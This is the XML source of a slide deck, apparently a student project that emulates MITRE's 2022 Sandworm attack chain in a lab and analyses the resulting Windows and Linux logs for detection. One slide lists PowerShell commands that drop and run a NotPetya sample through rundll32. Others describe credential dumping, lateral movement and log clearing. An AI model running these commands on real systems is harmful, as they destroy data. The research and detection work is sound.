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6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Maven Pro" panose="02020500000000000000" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunito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2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81e4be5a3_1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81e4be5a3_1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1e39092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1e39092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b4ec9eec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b4ec9eec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6854110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6854110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Topology 如圖中所顯示，有四台 computers 分別是一台 attacker、一台linux server、一台 Windows victim、一台 Domain Controller。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我們用 virtualbox 分別建立在同不同 host 上，再用 openvpn 把四台 VM 放在同一個 internel net 裡面。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2cc3c3f0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2cc3c3f0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2cc3c3f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2cc3c3f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2cc3c3f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2cc3c3f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2062928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2062928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2062928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2062928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2062928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2062928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6854110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6854110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1e390920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1e390920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2cc3c3f0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2cc3c3f0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2cc3c3f0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2cc3c3f0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1e390920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1e390920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2cc3c446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2cc3c446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2cc3c446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2cc3c446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2cc3c446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2cc3c446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52cc3c4466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52cc3c4466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2cc3c446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2cc3c446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52cc3c446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52cc3c446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6854110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6854110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2cc3c446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2cc3c4466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2062928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2062928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51e390920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51e390920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1e390920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51e390920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1e390920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51e390920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1e390920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51e390920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81e4be5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81e4be5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b4ec9eec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b4ec9eec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6854110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6854110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b4ec9eeca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b4ec9eeca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81e4be5a3_1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81e4be5a3_1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81e4be5a3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81e4be5a3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technology-5693373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ttackevals.mitre-engenuity.org/enterprise/wizard-spider-sandwor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50505"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E4E6E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/>
              <a:t>Sandworm APT Campa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="3200"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="3200" b="1"/>
              <a:t>gn Emulation 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/>
              <a:t>based on MITRE ATT&amp;CK</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1"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choose Sandworm attack chain </a:t>
            </a:r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因為 Sandworm attack chain 涉及 Linux 以及 Windows 兩大 OS 平台，我們認為這是比起 Wizard Spider attack chain 只涉及到 Windows 來的更加general。能夠在重現 Sandworm attack chain 的同時，學習下 Linux 以及Windows 的指令。更能夠從中發現一些類似的攻擊行為在兩個平台的異樣之處，或是為了達到相同目的，在兩個平台不一樣的達成方式。</a:t>
            </a:r>
            <a:endParaRPr sz="160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</a:t>
            </a:r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170"/>
            <a:ext cx="9144000" cy="380840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Contributions</a:t>
            </a:r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將 Sandworm attack chain 以自動化腳本方式重現，以降低反覆攻擊時所需的人工成本，以利進行後續行為分析。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分析攻擊行為發生時，victim host 有沒有任何可疑的 system log，以協助未來可能的受害者及早發現，並做出合適的對應。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361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12" y="1053150"/>
            <a:ext cx="7271776" cy="40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Setup - Topology</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369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script-overall</a:t>
            </a:r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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1277000"/>
            <a:ext cx="72534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start the control server and RDP channel in the foreground without halting the main process automatically, use gnome-ternimal to execute them.</a:t>
            </a:r>
            <a:endParaRPr sz="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Sleep 10 seconds between each script to ensure that every script finishes their work.</a:t>
            </a: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50" y="2310950"/>
            <a:ext cx="54673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linux server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test ssh host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Scan the whether the host is in the ssh known hosts already, if not, store its ssh key into ssh known_hosts so that the following “sshpass” can function correctly.</a:t>
            </a:r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778863"/>
            <a:ext cx="68008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linux server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Setup persistence and gain credentials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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097550" y="1597875"/>
            <a:ext cx="77742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Use sshpass so that the script will not ask the user for password and thus realize automation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392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0" y="2126651"/>
            <a:ext cx="8397004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Move laterally to Windows host</a:t>
            </a:r>
            <a:endParaRPr sz="2750"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399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88200"/>
            <a:ext cx="637389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r>
              <a:rPr lang="zh-TW"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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Windows Discovery</a:t>
            </a:r>
            <a:endParaRPr sz="2750"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Google Shape;406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19651"/>
            <a:ext cx="7420275" cy="27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r>
              <a:rPr lang="zh-TW"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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Credential Dumping</a:t>
            </a:r>
            <a:endParaRPr sz="2750"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413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00" y="1750275"/>
            <a:ext cx="7948599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Outline</a:t>
            </a:r>
            <a:endParaRPr b="1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Abstract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Motivation and Purpose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MITRE Evaluation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Wizard Spider &amp; Sandworm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Flow chart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Contributions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Environment Setup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Automation script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Log analysis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Conclusion</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/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Automation script-Domain Controller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Deploy NotPetya</a:t>
            </a:r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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1193550"/>
            <a:ext cx="7030500" cy="14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</a:rPr>
              <a:t>Copy-Item "\\TSCLIENT\X\SharpNP.dll" "C:\Windows\perfc.dat"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</a:rPr>
              <a:t>dir "C:\Windows\perfc.dat"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rgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; "rundll32.exe" "C:\Windows\perfc.dat,#1"</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p3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pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;4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44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analysis-Linux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Cron log</a:t>
            </a:r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29" name="Google Shape;429;p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pic>
        <p:nvPicPr>
          <p:cNvPr id="430" name="Google Shape;4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00" y="1476775"/>
            <a:ext cx="5551550" cy="36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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546175" y="4455925"/>
            <a:ext cx="5532000" cy="23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analysis-Linux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Httpd log</a:t>
            </a:r>
            <a:endParaRPr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38" name="Google Shape;438;p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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="439" name="Google Shape;4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966913"/>
            <a:ext cx="76390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45" name="Google Shape;445;p35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hklm/system 內存放的內容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是與系統相關的設定等資訊。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從這個 system log 可以發現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有被撈取了 hklm/system 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痕跡。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446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650" y="1359875"/>
            <a:ext cx="6350249" cy="37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從前一條 log 往回追溯，可以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發現 oradump.exe 這支不明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程式。可以從這裡推斷出該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程式是一支用來盜取系統資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訊的程式。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p3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pic>
        <p:nvPicPr>
          <p:cNvPr id="455" name="Google Shape;4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400" y="1525450"/>
            <a:ext cx="6397600" cy="36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61" name="Google Shape;461;p37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再繼續往前查看 oradump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下的其他指令可以發現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hklm/security 內存放的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關於系統的安全性設定內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容也有被撈取的痕跡。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;462;p3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pic>
        <p:nvPicPr>
          <p:cNvPr id="463" name="Google Shape;4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504" y="1435500"/>
            <a:ext cx="6850846" cy="38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69" name="Google Shape;469;p38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oradump 所下的第一條指令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是撈取 hklm/sam 的內容，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hklm/sam 內部存放的是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跟使用者的帳號密碼。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470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pic>
        <p:nvPicPr>
          <p:cNvPr id="471" name="Google Shape;4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75" y="1484050"/>
            <a:ext cx="6455374" cy="36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77" name="Google Shape;477;p39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往回追溯 log 可以發現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是 rundll32 執行的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wsmprovav.dll 這支程式，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執行了 oradump.exe 這一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支可疑的應用程式。</a:t>
            </a:r>
            <a:endParaRPr sz="160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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="479" name="Google Shape;4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492" y="1435500"/>
            <a:ext cx="6557757" cy="3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3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從 wsmprovav.dll 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ParentCommandLine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可以發現是 wsmprovav.exe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透過網路到可疑的 ip 下載的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檔案。顧可以推測攻擊者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透過網路的方式植入了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wsmprovav.dll 這個疑似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後門的可疑程式。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;p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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Google Shape;4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825" y="1435500"/>
            <a:ext cx="6422874" cy="37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493" name="Google Shape;493;p41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3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再往前追溯 log 可以發現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SetRegistry 的執行檔被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執行後，對 registry hive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新增了剛剛 log 中執行的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wsmprovav.exe。可以推測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是攻擊者透過執行 SetRegistry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，再透過觸發登入的動作來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植入疑似後門的程式。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="Google Shape;4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153" y="1597875"/>
            <a:ext cx="6181425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endParaRPr b="1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101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dirty="0"/>
              <a:t>我們重現了 Mitre Evaluation 在 2022 年所選出的 Wizard Spider 和Sandworm 兩個組織中的 Sandworm attack chain。並嘗試將 attack chain 透過自動化流程進行，在成功實現自動化後，再透過分析 system log，找出 Sandworm attack chain 在執行時被記錄下的異常行為。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/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lateral windows victim</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1435500"/>
            <a:ext cx="7030500" cy="3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最後發現執行 SetRegistry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的 ParentCommandLine 是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在C:\Windows 之下的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xSUDvXac.exe 這支程式。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但 Windows 資料夾之下應該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都是跟系統運行相關的程式，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不應該去透過網路執行下載的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動作。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Google Shape;5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450" y="1597875"/>
            <a:ext cx="606385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analysis-Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Google Shape;517;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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這條log乍看之下沒有問題，不過在後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續幾條log中可以回推出都是基於這條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log所執行的command。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="518" name="Google Shape;5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100" y="1266575"/>
            <a:ext cx="5479899" cy="38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analysis-Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Google Shape;525;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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基於第一條log，這是第一個連鎖行為。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由CommandLine一欄可以得知這條指令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的目的是創建一個scheduled task，在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指定的時間(06:00)執行Restart的動作。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;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50" y="1339600"/>
            <a:ext cx="5427751" cy="37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analysis-Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1300950"/>
            <a:ext cx="3789300" cy="3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基於第一條log，這是第二個連鎖行為。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由CommandLine一欄可以得知這條指令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的目的是清除 Windows 事件記錄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（Event Log）和 NTFS 檔案系統的 USN（Update Sequence Number）記錄。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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25" y="1232775"/>
            <a:ext cx="5500774" cy="38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analysis-Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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基於第一條log，這是第三個連鎖行為。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由CommandLine一欄可以得知這條指令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的目的是執行一個已經存在的名為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"Restart" 的scheduled task，也就是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第二條log下的command。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="542" name="Google Shape;5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25" y="1287450"/>
            <a:ext cx="5500774" cy="38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549" name="Google Shape;549;p4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我們根據MITRE Evaluation在2022年評估的Sandworm attack chain為basis，實現了以自動化腳本重現此攻擊串鏈，成功減少大量的人工成本。以及分析在攻擊行為當下，victim host的system log，順利找出有關的可疑log，提供有受攻擊疑慮的資安企業一個檢查方向。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未來研究方向包含: 置換攻擊串鏈所使用的TTPs以達成相同的目的、分析攻擊腳本的內容，期望對類似的攻擊行為找出對抗的方式。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;p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Purpose</a:t>
            </a:r>
            <a:endParaRPr b="1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由於近年來勒索軟體的氾濫和猖獗，對企業造成無法估量的傷害，導致各國金融方面上的損失。為了避免這種情況接二連三的上演，我們期望透過對這類的攻擊手法進行研究以及分析，能有更深入的理解，進而提早做出防範或是避免金融損失。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299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Purpose</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="4410175"/>
            <a:ext cx="44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https://www.bbc.com/news/technology-56933733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150" y="1537275"/>
            <a:ext cx="4023151" cy="4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390" y="2286175"/>
            <a:ext cx="4854668" cy="57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3913" y="3143188"/>
            <a:ext cx="69246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MITRE Evaluation</a:t>
            </a:r>
            <a:endParaRPr b="1"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4356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MITRE Engenuity ATT&amp;CK Evaluations 基於 ATT&amp;CK Matrix ，提供資安企業對於惡意行為對抗能力的客觀評估。使得資安企業能夠因此清楚他們的能力以及缺失，在未來做出改進，進而讓自己的解決方案更加完善。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ATT&amp;CK Evaluation 透過模擬惡意行為進行測試，推進企業能力的發展。基於 ATT&amp;CK 做評估，使得攻擊和防禦方面的安全從業人員都能理解。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MITRE Evaluation 以高度的公正性以及透明度著名，將 Evaluaition 的方法和結果提供給所有人。期望企業對於自身防禦方面的網路安全投資做出明智的決策，並更有效地使用相對應的能力。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316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MITRE Evaluation</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Google Shape;322;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="12930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參與 MITRE Engenuity ATT&amp;CK Evaluations 的著名資安相關企業:</a:t>
            </a:r>
            <a:endParaRPr sz="16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75" y="1654138"/>
            <a:ext cx="4625501" cy="2923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1212025" y="4634250"/>
            <a:ext cx="62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https://attackevals.mitre-engenuity.org/enterprise/wizard-spider-sandworm</a:t>
            </a:r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559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Why choose Wizard Spider and Sandworm  </a:t>
            </a:r>
            <a:endParaRPr sz="2820"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Mitre Evaluation 2022 的目標聚焦於多個組織如何濫用資料加密以進行影響。Wizard Spider利用資料加密進行勒索軟體攻擊，例如廣為人知的 Ryuk 惡意軟體。而 Sandworm 則利用加密來摧毀資料，尤其以冒充勒索軟體的 NotPetya 惡意軟體最為著名。雖然去年評估的共同主題是資料加密的影響，但兩個組織都對廣泛的 post-exploitation 手法有重要報告。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332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Similarities and differences </a:t>
            </a:r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相似處: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安裝後門程式，並且保障與攻擊者主機的連線 (C2 channel)。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蒐集受害者的憑證，以進行後續受害者之間的平行移動，直到找出Domain Controller。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不同處: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Initial compromise : Wizard Spider 使用 clickbait user 的方式觸發 ，而 Sandworm 則是使用 zero-day exploit 的手法入侵。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Impact : Wizard Spider 有刪除備份檔案，防範受害者進行系統還原，Sandworm 則沒有。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Persistence : Sandworm 執行 Initial compromise 後，有在 server 上佈署 PAS webshell，屬於 Sandworm attack chain 的特色之一。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Target OS: Sandworm攻擊Windows以及Linux平台，而Wizard Spider只對Windows平台進行攻擊。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Google Shape;33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2083</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (16:9)</PresentationFormat>
  <Paragraphs>185</Paragraphs>
  <Slides>35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Arial</vt:lpstr>
      <vt:lpstr>Nunito</vt:lpstr>
      <vt:lpstr>Maven Pro</vt:lpstr>
      <vt:lpstr>Momentum</vt:lpstr>
      <vt:lpstr> Sandworm APT Campaign Emulation  based on MITRE ATT&amp;CK</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>Motivation and Purpose</vt:lpstr>
      <vt:lpstr>Motivation and Purpose</vt:lpstr>
      <vt:lpstr>MITRE Evaluation</vt:lpstr>
      <vt:lpstr>MITRE Evaluation</vt:lpstr>
      <vt:lpstr>Why choose Wizard Spider and Sandworm  </vt:lpstr>
      <vt:lpstr>Similarities and differences </vt:lpstr>
      <vt:lpstr>Why we choose Sandworm attack chain </vt:lpstr>
      <vt:lpstr>Flow chart</vt:lpstr>
      <vt:lpstr>Contributions</vt:lpstr>
      <vt:lpstr>Setup - Topology</vt:lpstr>
      <vt:lpstr>Automation script-overall</vt:lpstr>
      <vt:lpstr>Automation script-linux server test ssh host</vt:lpstr>
      <vt:lpstr>Automation script-linux server Setup persistence and gain credentials</vt:lpstr>
      <vt:lpstr>Automation script-lateral windows victim Move laterally to Windows host</vt:lpstr>
      <vt:lpstr>Automation script-lateral windows victim Windows Discovery</vt:lpstr>
      <vt:lpstr>Automation script-lateral windows victim Credential Dumping</vt:lpstr>
      <vt:lpstr>Automation script-Domain Controller Deploy NotPetya</vt:lpstr>
      <vt:lpstr>Log analysis-Linux server Cron log</vt:lpstr>
      <vt:lpstr>Log analysis-Linux server Httpd log</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-lateral windows victim</vt:lpstr>
      <vt:lpstr>Log analysis-Domain Controller</vt:lpstr>
      <vt:lpstr>Log analysis-Domain Controller</vt:lpstr>
      <vt:lpstr>Log analysis-Domain Controller</vt:lpstr>
      <vt:lpstr>Log analysis-Domain Controller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Sandworm APT Campaign Emulation  based on MITRE ATT&amp;CK</dc:title>
  <cp:lastModifiedBy>陳星宇</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-26T13:43:27Z</dcterms:modified>
</cp:coreProperties>
</file>